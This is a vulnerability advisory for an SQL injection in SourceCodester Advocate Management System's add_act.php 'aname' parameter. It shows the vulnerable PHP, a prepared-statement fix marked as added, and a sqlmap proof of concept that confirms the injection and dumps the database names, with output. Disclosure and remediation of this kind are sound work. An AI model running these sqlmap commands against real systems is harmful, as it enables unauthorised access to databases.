
CVE-2024-6729


Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Advocate Management System

Affected components: /control/add_act.php

Injection parameter: MULTIPART aname


POC


The add_act.php file inserts the user-supplied aname value directly into the SQL query, without any parameterization.


$aname = $_POST['aname'];   // untrusted POST input, used without validation or escaping
// ... <SNIP> ...
$sql = "INSERT INTO legel_acts(act_name,status) VALUES ('$aname','1')";   // $aname interpolated straight into the statement
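The same insert written with a prepared statement, as an added example that is not the vendor's code or part of the original advisory; it assumes an existing mysqli connection in $conn (a hypothetical name) and keeps the table and column names shown above.

```php
<?php
// Added example (not the vendor's code): add_act.php's insert rewritten with
// a prepared statement. Assumes a mysqli connection in $conn (hypothetical
// name) and the legel_acts(act_name, status) table from the advisory.

// Reject missing, empty or oversized input instead of inserting it blindly.
$aname = isset($_POST['aname']) ? trim($_POST['aname']) : '';
if ($aname === '' || strlen($aname) > 255) {
    http_response_code(400);
    exit('Invalid act name');
}

// The placeholder keeps the act name as data: quotes or SQL keywords in it
// can no longer change the structure of the statement.
$stmt = $conn->prepare(
    "INSERT INTO legel_acts(act_name, status) VALUES (?, '1')"
);
if ($stmt === false) {
    http_response_code(500);
    exit('Database error');
}
$stmt->bind_param('s', $aname);   // 's' binds the value as a string
if (!$stmt->execute()) {
    http_response_code(500);
    exit('Database error');
}
$stmt->close();
```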

Intercept the request using Burp Suite Proxy.


Save the request to control.add_act.txt.

The vulnerability can be verified with the following command:

sqlmap -r control.add_act.txt --batch


Parameter: MULTIPART aname ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------8879615583215427378340903645
Content-Disposition: form-data; name="aname"

The databases can be dumped with the following command:

sqlmap -r control.add_act.txt --batch --dbs


[04:20:26] [INFO] fetching database names
[04:20:26] [INFO] resumed: 'information_schema'
[04:20:26] [INFO] resumed: 'kortex_lite'
available databases [2]:
[*] information_schema
[*] kortex_lite